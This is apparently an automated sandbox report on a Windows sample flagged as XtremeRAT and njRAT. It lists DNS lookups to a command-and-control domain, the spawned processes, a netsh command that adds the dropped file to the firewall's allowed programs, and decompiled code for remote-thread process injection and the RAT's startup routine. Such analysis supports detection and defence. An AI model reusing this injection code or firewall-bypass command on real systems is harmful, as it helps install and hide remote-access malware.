Sep 30, 2021 16:44:29.341336966 CEST	8.8.8.8	192.168.2.3	0x3033	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:32.887037039 CEST	8.8.8.8	192.168.2.3	0x2205	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:36.541001081 CEST	8.8.8.8	192.168.2.3	0x50b0	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:40.098599911 CEST	8.8.8.8	192.168.2.3	0x379d	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:43.710228920 CEST	8.8.8.8	192.168.2.3	0x216f	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:47.261413097 CEST	8.8.8.8	192.168.2.3	0x4000	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:50.806456089 CEST	8.8.8.8	192.168.2.3	0xde99	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:54.353445053 CEST	8.8.8.8	192.168.2.3	0x5e1f	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:58.984798908 CEST	8.8.8.8	192.168.2.3	0xcbd3	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:02.669064045 CEST	8.8.8.8	192.168.2.3	0x3f15	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:06.225447893 CEST	8.8.8.8	192.168.2.3	0xb135	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:09.784416914 CEST	8.8.8.8	192.168.2.3	0xaf7a	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:13.470329046 CEST	8.8.8.8	192.168.2.3	0xd330	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:17.014648914 CEST	8.8.8.8	192.168.2.3	0xc57b	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:20.774147034 CEST	8.8.8.8	192.168.2.3	0x4333	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:24.336463928 CEST	8.8.8.8	192.168.2.3	0xf18b	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:27.901789904 CEST	8.8.8.8	192.168.2.3	0x1ca5	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:31.428962946 CEST	8.8.8.8	192.168.2.3	0x88fa	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:34.967259884 CEST	8.8.8.8	192.168.2.3	0xf679	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 7FW4ce2RDy.exe PID: 6908 Parent PID: 4436

General

Start time:	16:43:25
Start date:	30/09/2021
Path:	C:\Users\user\Desktop\7FW4ce2RDy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\7FW4ce2RDy.exe'
Imagebase:	0x10000000
File size:	354304 bytes
MD5 hash:	776211EED31B6A8EA3539AC1D822362C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: RAT_njRat, Description: Detects njRAT, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: RAT_njRat, Description: Detects njRAT, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, Author: Jean-Philippe Teissier / @Jipe_
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3652 Parent PID: 6908

General

Start time:	16:43:26
Start date:	30/09/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	svchost.exe
Imagebase:	0x1b0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: RAT_Xtreme, Description: Detects Xtreme RAT, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Xtreme_Sep17_1, Description: Detects XTREME sample analyzed in September 2017, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_XtremeRat, Description: Yara detected Xtreme RAT, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_
Reputation:	high

Chronological Activities

Analysis Process: chrome.exe PID: 5608 Parent PID: 6908

General

Start time:	16:43:26
Start date:	30/09/2021
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe
Imagebase:
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 562Server.exe PID: 4472 Parent PID: 6908

General

Start time:	16:43:27
Start date:	30/09/2021
Path:	C:\Windows\SysWOW64\562Server.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\562Server.exe'
Imagebase:	0x1d0000
File size:	29696 bytes
MD5 hash:	B207157C9F171556BF4D240C14AABA0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_njRat, Description: Detects njRAT, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Windows\SysWOW64\562Server.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 6460 Parent PID: 3652

General

Start time:	16:43:28
Start date:	30/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564
Imagebase:	0xef0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: System.exe PID: 5712 Parent PID: 4472

General

Start time:	16:43:29
Start date:	30/09/2021
Path:	C:\Users\user\AppData\Local\Temp\System.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\System.exe'
Imagebase:	0x3e0000
File size:	29696 bytes
MD5 hash:	B207157C9F171556BF4D240C14AABA0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_njRat, Description: Detects njRAT, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 2992 Parent PID: 3652

General

Start time:	16:43:29
Start date:	30/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512
Imagebase:	0xef0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 6764 Parent PID: 5712

General

Start time:	16:43:32
Start date:	30/09/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE
Imagebase:	0xe40000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3156 Parent PID: 6764

General

Start time:	16:43:33
Start date:	30/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70d6e0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: System.exe PID: 6552 Parent PID: 3352

General

Start time:	16:43:41
Start date:	30/09/2021
Path:	C:\Users\user\AppData\Local\Temp\System.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\System.exe' ..
Imagebase:	0xd50000
File size:	29696 bytes
MD5 hash:	B207157C9F171556BF4D240C14AABA0E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_njRat, Description: Detects njRAT, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: System.exe PID: 3156 Parent PID: 3352

General

Start time:	16:43:50
Start date:	30/09/2021
Path:	C:\Users\user\AppData\Local\Temp\System.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\System.exe' ..
Imagebase:	0x3e0000
File size:	29696 bytes
MD5 hash:	B207157C9F171556BF4D240C14AABA0E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_njRat, Description: Detects njRAT, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: System.exe PID: 6872 Parent PID: 3352

General

Start time:	16:43:58
Start date:	30/09/2021
Path:	C:\Users\user\AppData\Local\Temp\System.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\System.exe' ..
Imagebase:	0x240000
File size:	29696 bytes
MD5 hash:	B207157C9F171556BF4D240C14AABA0E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_njRat, Description: Detects njRAT, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: RAT_njRat, Description: Detects njRAT, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 7FW4ce2RDy.exe PID: 6908 Parent PID: 4436 7FW4ce2RDy.exeCOMMON

Executed Functions

Function 100098A8, Relevance: 10.6, APIs: 7, Instructions: 70
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E100098A8(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t20;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000); // executed
				_t20 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40); // executed
				_t37 = _t20;
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24); // executed
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20); // executed
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}

0x100098af
0x100098b3
0x100098b6
0x100098ba
0x100098c5
0x100098cb
0x100098cc
0x100098d0
0x100098d1
0x100098d4
0x100098db
0x100098de
0x100098ea
0x100098f9
0x100098fe
0x10009902
0x10009914
0x1000991d
0x10009935
0x1000993b
0x10009940
0x10009940
0x1000991d
0x1000994f

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 100098C0
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 100098EA
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 100098F9
GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 1000990C
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 10009914
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 10009935
CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 1000993B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
String ID:
API String ID: 2398686212-0
Opcode ID: c8b9f5ed8a23e53db09e119bfd08287f0d6aeb9eed48f96718b2bf67d83e23c7
Instruction ID: 56678c190a81291c74d5659315aa0a406f5499a7e455af1083e81e7bb303a9db
Opcode Fuzzy Hash: c8b9f5ed8a23e53db09e119bfd08287f0d6aeb9eed48f96718b2bf67d83e23c7
Instruction Fuzzy Hash: 161130B52443417FE350DA69CC82F2B77ECEBC4790F01882CB648D7292DA70F814876A

Uniqueness

Uniqueness Score: -1.00%

Function 10005CA4, Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005CA4(WCHAR* __eax) {
				void* _t2;
				void* _t5;
				struct _WIN32_FIND_DATAW* _t6;

				_t5 = 0;
				_t2 = FindFirstFileW(__eax, _t6); // executed
				if(_t2 != 0xffffffff) {
					_t5 = 1;
				}
				FindClose(_t2);
				return _t5;
			}

0x10005cab
0x10005caf
0x10005cb7
0x10005cb9
0x10005cb9
0x10005cbc
0x10005cca

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CAF
FindClose.KERNEL32(00000000,00000000,?,00000000,1000D3CA,.cfg,?,?,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005CBC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 330f1bf4dbc552c91da48253f5c4906a029c88ec3c8321f42aab6186b9465800
Instruction ID: 7a3a1ab874b80ece1c9db2ee4d12350f52d059cd31b038f16b98c78c9643ece9
Opcode Fuzzy Hash: 330f1bf4dbc552c91da48253f5c4906a029c88ec3c8321f42aab6186b9465800
Instruction Fuzzy Hash: CBC01295941A0016B90055B45CCB897210DD7411B5F150731BA25863D4DB1E581A10A9

Uniqueness

Uniqueness Score: -1.00%

Function 1000D0F4, Relevance: 54.6, APIs: 18, Strings: 13, Instructions: 400
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				void _v5040;
				char _v5044;
				char _v5048;
				void _v5572;
				char _v5576;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char* _t62;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr _t119;
				void* _t122;
				void* _t124;
				int* _t152;
				int* _t156;
				void* _t170;
				intOrPtr _t174;
				intOrPtr _t177;
				intOrPtr _t194;
				intOrPtr _t197;
				intOrPtr _t203;
				intOrPtr _t210;
				intOrPtr _t216;
				intOrPtr _t219;
				intOrPtr _t225;
				intOrPtr _t240;
				WCHAR* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				intOrPtr _t301;
				intOrPtr _t305;
				void* _t336;
				void* _t340;
				void* _t349;
				intOrPtr _t354;
				intOrPtr _t355;
				void* _t357;
				void* _t368;

				_t243 = __ebx;
				_t354 = _t355;
				_t247 = 0x2bc;
				do {
					_push(0);
					_push(0);
					_t247 = _t247 - 1;
				} while (_t247 != 0);
				_push(__ebx);
				E10004CE4(E1000D030);
				_push(_t354);
				_push(0x1000d759);
				_push( *[fs:eax]);
				 *[fs:eax] = _t355;
				E10003024(0x1000d0d0);
				_t62 =  *0x1000e134; // 0x1000e020
				 *_t62 = 1;
				SetErrorMode(0x8007); // executed
				E10005954(1,  &_v24);
				E10003A34(_v24, L"restart");
				if(0 == 0) {
					E10005954(0,  &_v28);
					E100037AC(0x10012580, _v28);
					_t240 =  *0x10012580; // 0x781fa4
					ShellExecuteW(0, L"open", E1000390C(_t240), 0, 0, 0);
					ExitProcess(0);
				}
				E10005954(1,  &_v32);
				E10003A34(_v32, L"update");
				if(0 == 0) {
					Sleep(0x1770);
				}
				E100050D8();
				E100051E8(0,  &_v5040);
				memcpy(0x1000f834,  &_v5040, 0x4e4 << 2);
				_t336 = 0x1000f834;
				E10003BE4(0x10012580, 0x9c8);
				_t79 =  *0x10012580; // 0x781fa4
				E100050D0(E1000390C(_t79), _t336);
				_t82 =  *0x10012580; // 0x781fa4, executed
				E10006234(_t82, _t243,  &_v5044, L"CONFIG",  &_v5040, 0); // executed
				E100037AC(0x10012580, _v5044);
				E100050D8();
				_t88 =  *0x10012580; // 0x781fa4
				E100050D0(_t336, E1000390C(_t88));
				_t348 = _t336;
				memcpy("e", _t336, 0x4e4 << 2);
				_t357 = _t355 + 0x18;
				_t340 = _t336;
				E100037AC(0x100432d4, L"SOFTWARE\\XtremeRAT");
				SHDeleteKeyW(0x80000001, E1000390C( *0x100432d4)); // executed
				_t13 = _t340 + 0xfaa; // 0x100107de
				E100038E0(0x100432d4, 0x3d, _t13);
				E1000577C(0x80000001, _t243, L"Mutex", L"SOFTWARE\\XtremeRAT", _t336, 0, 2,  *0x100432d4); // executed
				E10005664( &_v5572);
				E100038E0( &_v5048, 0x105,  &_v5572);
				E10003928( &_v5048, 0x105, L"\\Microsoft\\Windows\\", 0);
				if(E10005690(E1000390C(_v5048)) != 1) {
					E10005664( &_v5572);
					E100038E0( &_v5584, 0x105,  &_v5572);
					_push(_v5584);
					_push( *0x1000e0f8);
					_t31 = _t340 + 0xfaa; // 0x100107de
					_t259 = 0x3d;
					E100038E0( &_v5588, 0x3d, _t31);
					_push(_v5588);
					_push(L".cfg");
					E100039EC();
				} else {
					E10005664( &_v5572);
					E100038E0( &_v5576, 0x105,  &_v5572);
					_push(_v5576);
					_push(L"\\Microsoft\\Windows\\");
					_t24 = _t340 + 0xfaa; // 0x100107de
					_t259 = 0x3d;
					E100038E0( &_v5580, 0x3d, _t24);
					_push(_v5580);
					_push(L".cfg");
					E100039EC();
				}
				_t119 =  *0x10012584; // 0x77139c
				_t244 = E1000390C(_t119);
				_t122 = E10005CA4(_t244);
				_t363 = _t122;
				if(_t122 != 0) {
					SetFileAttributesW(_t244, 0x80);
					 *0x100432cc = E1000CF04(_t244, 0x10012588);
					 *0x100432d0 = 0x10012588;
					_t210 =  *0x10012584; // 0x77139c
					E10005F1C(_t210, _t244, _t259, _t348);
					E10003BE4(0x10012580, E10003FD4( *0x100432cc,  *0x100432d0, 2, 0));
					_t216 =  *0x10012580; // 0x781fa4
					E100050D0(E1000390C(_t216), 0x10012588);
					_t219 =  *0x10012580; // 0x781fa4
